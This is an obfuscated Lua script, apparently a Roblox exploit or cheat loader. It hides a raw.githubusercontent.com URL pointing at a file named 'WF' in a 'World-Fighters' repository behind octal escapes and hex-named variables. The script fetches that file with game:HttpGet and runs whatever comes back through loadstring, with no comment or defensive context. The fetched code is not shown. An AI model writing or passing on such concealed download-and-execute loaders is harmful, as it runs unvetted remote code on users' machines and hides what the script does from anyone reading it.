local _0x526f6f74 = "\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47"
local _0x4c6f63 = {["\105"] = "\80\117\99\104\111\49\82\68", ["\105\105"] = "\87\111\114\108\100\45\70\105\103\104\116\101\114\115"}
local _0x4272616e6368 = "\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47"
local _0x46696c65 = "\87\70"

local lIlIllIlIlI = function(lIlIIl) 
    local l1l1 = "" 
    l1l1 = _0x4c6f63["\105"] .. "\47" .. _0x4c6f63["\105\105"]
    return l1l1 
end

local function IIllllIIllll(llIl)
    local success, res = pcall(function()
        return game:HttpGet(llIl)
    end)
    if success then return res end
    return nil
end

local function _0x45786563(_0x636f6465)
    if not _0x636f6465 then return end
    local _0x666e, _0x657272 = loadstring(_0x636f6465)
    if _0x666e then 
        task.spawn(_0x666e) 
    else 
        return nil
    end
end

local function _init_()
    local _target = _0x526f6f74 .. lIlIllIlIlI() .. "\47" .. _0x4272616e6368 .. _0x46696c65
    local _payload = IIllllIIllll(_target)
    _0x45786563(_payload)
end

_init_()
